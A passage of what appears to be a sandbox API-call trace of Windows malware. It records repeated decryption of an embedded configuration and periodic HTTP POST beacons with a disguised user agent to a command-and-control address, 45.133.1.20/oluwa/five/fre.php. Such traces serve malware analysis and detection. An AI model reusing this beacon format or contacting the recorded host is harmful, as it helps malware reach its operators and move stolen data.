lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0301.740] GetProcessHeap () returned 0x6a0000 [0301.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da648 | out: hHeap=0x6a0000) returned 1 [0301.740] GetProcessHeap () returned 0x6a0000 [0301.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0301.741] closesocket (s=0xb68) returned 0 [0301.741] GetProcessHeap () returned 0x6a0000 [0301.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0301.741] GetProcessHeap () returned 0x6a0000 [0301.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0301.742] GetProcessHeap () returned 0x6a0000 [0301.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0301.742] GetProcessHeap () returned 0x6a0000 [0301.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0301.743] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18a0) returned 0xb68 [0301.746] Sleep (dwMilliseconds=0xea60) [0301.748] GetProcessHeap () returned 0x6a0000 [0301.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0301.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.750] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0301.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.759] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0301.771] GetProcessHeap () returned 0x6a0000 [0301.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0301.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.772] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0301.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.774] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0301.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.775] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.775] GetProcessHeap () returned 0x6a0000 [0301.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0301.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.806] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0301.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.822] CryptDestroyKey (hKey=0x6ad020) returned 1 [0301.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.827] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0301.827] GetProcessHeap () returned 0x6a0000 [0301.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0301.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.828] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0301.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.830] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0301.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.831] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0301.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.832] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0301.832] GetProcessHeap () returned 0x6a0000 [0301.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0301.832] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0301.833] GetProcessHeap () returned 0x6a0000 [0301.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0301.837] GetProcessHeap () returned 0x6a0000 [0301.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0301.838] GetProcessHeap () returned 0x6a0000 [0301.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0301.838] GetProcessHeap () returned 0x6a0000 [0301.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0301.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.840] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0301.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.852] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0301.864] GetProcessHeap () returned 0x6a0000 [0301.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0301.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.866] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0301.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.870] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0301.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.871] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.871] GetProcessHeap () returned 0x6a0000 [0301.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0301.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.873] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0301.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.874] CryptDestroyKey (hKey=0x6ad020) returned 1 [0301.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.875] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0301.875] GetProcessHeap () returned 0x6a0000 [0301.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0301.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.876] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0301.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.878] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0301.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.879] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0301.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.880] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0301.880] GetProcessHeap () returned 0x6a0000 [0301.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0301.880] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0301.880] GetProcessHeap () returned 0x6a0000 [0301.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0301.880] socket (af=2, type=1, protocol=6) returned 0xb6c [0301.881] connect (s=0xb6c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0301.906] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0301.906] GetProcessHeap () returned 0x6a0000 [0301.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0301.907] GetProcessHeap () returned 0x6a0000 [0301.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6df748 [0301.908] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0301.908] wvsprintfA (in: param_1=0x6df748, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0301.909] GetProcessHeap () returned 0x6a0000 [0301.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da648 [0301.909] GetProcessHeap () returned 0x6a0000 [0301.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0301.909] GetProcessHeap () returned 0x6a0000 [0301.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0301.909] GetProcessHeap () returned 0x6a0000 [0301.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6df748 [0301.910] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0301.912] wvsprintfA (in: param_1=0x6df748, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0301.912] GetProcessHeap () returned 0x6a0000 [0301.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0301.913] GetProcessHeap () returned 0x6a0000 [0301.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0301.913] send (s=0xb6c, buf=0x6bd460*, len=242, flags=0) returned 242 [0301.914] send (s=0xb6c, buf=0x6bb998*, len=159, flags=0) returned 159 [0301.914] GetProcessHeap () returned 0x6a0000 [0301.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0301.914] recv (in: s=0xb6c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0302.015] GetProcessHeap () returned 0x6a0000 [0302.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0302.016] GetProcessHeap () returned 0x6a0000 [0302.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0302.016] GetProcessHeap () returned 0x6a0000 [0302.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da648 | out: hHeap=0x6a0000) returned 1 [0302.017] GetProcessHeap () returned 0x6a0000 [0302.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0302.018] closesocket (s=0xb6c) returned 0 [0302.018] GetProcessHeap () returned 0x6a0000 [0302.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0302.019] GetProcessHeap () returned 0x6a0000 [0302.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0302.019] GetProcessHeap () returned 0x6a0000 [0302.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0302.019] GetProcessHeap () returned 0x6a0000 [0302.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0302.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18a4) returned 0xb6c [0302.024] Sleep (dwMilliseconds=0xea60) [0302.025] GetProcessHeap () returned 0x6a0000 [0302.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0302.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.027] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0302.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.037] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0302.115] GetProcessHeap () returned 0x6a0000 [0302.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0302.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.123] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0302.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.124] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0302.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.128] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.128] GetProcessHeap () returned 0x6a0000 [0302.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0302.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.130] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0302.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.131] CryptDestroyKey (hKey=0x6ad020) returned 1 [0302.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.132] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0302.132] GetProcessHeap () returned 0x6a0000 [0302.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0302.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.134] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0302.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.135] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0302.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.136] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0302.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.140] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0302.140] GetProcessHeap () returned 0x6a0000 [0302.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0302.141] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0302.141] GetProcessHeap () returned 0x6a0000 [0302.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0302.142] GetProcessHeap () returned 0x6a0000 [0302.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0302.142] GetProcessHeap () returned 0x6a0000 [0302.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0302.143] GetProcessHeap () returned 0x6a0000 [0302.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0302.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.144] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0302.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.535] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0302.549] GetProcessHeap () returned 0x6a0000 [0302.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0302.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.551] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0302.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.553] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0302.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.554] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.554] GetProcessHeap () returned 0x6a0000 [0302.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0302.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.556] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0302.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.558] CryptDestroyKey (hKey=0x6ad060) returned 1 [0302.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0302.559] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0302.559] GetProcessHeap () returned 0x6a0000 [0302.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0302.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.561] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0302.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.565] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0302.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.578] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0302.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0302.584] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0302.584] GetProcessHeap () returned 0x6a0000 [0302.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0302.584] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0302.584] GetProcessHeap () returned 0x6a0000 [0302.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0302.584] socket (af=2, type=1, protocol=6) returned 0xb70 [0302.586] connect (s=0xb70, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0302.610] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0302.610] GetProcessHeap () returned 0x6a0000 [0302.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0302.610] GetProcessHeap () returned 0x6a0000 [0302.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6df748 [0302.611] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0302.612] wvsprintfA (in: param_1=0x6df748, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0302.612] GetProcessHeap () returned 0x6a0000 [0302.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dadc8 [0302.613] GetProcessHeap () returned 0x6a0000 [0302.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0302.613] GetProcessHeap () returned 0x6a0000 [0302.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0302.613] GetProcessHeap () returned 0x6a0000 [0302.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6df748 [0302.663] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0302.664] wvsprintfA (in: param_1=0x6df748, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0302.664] GetProcessHeap () returned 0x6a0000 [0302.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0302.664] GetProcessHeap () returned 0x6a0000 [0302.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0302.665] send (s=0xb70, buf=0x6bd460*, len=242, flags=0) returned 242 [0302.666] send (s=0xb70, buf=0x6bb998*, len=159, flags=0) returned 159 [0302.666] GetProcessHeap () returned 0x6a0000 [0302.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0302.666] recv (in: s=0xb70, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0302.741] GetProcessHeap () returned 0x6a0000 [0302.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0302.743] GetProcessHeap () returned 0x6a0000 [0302.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0302.745] GetProcessHeap () returned 0x6a0000 [0302.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dadc8 | out: hHeap=0x6a0000) returned 1 [0302.746] GetProcessHeap () returned 0x6a0000 [0302.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0302.746] closesocket (s=0xb70) returned 0 [0302.747] GetProcessHeap () returned 0x6a0000 [0302.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0302.747] GetProcessHeap () returned 0x6a0000 [0302.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0302.747] GetProcessHeap () returned 0x6a0000 [0302.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0302.748] GetProcessHeap () returned 0x6a0000 [0302.748] HeapFree (in: 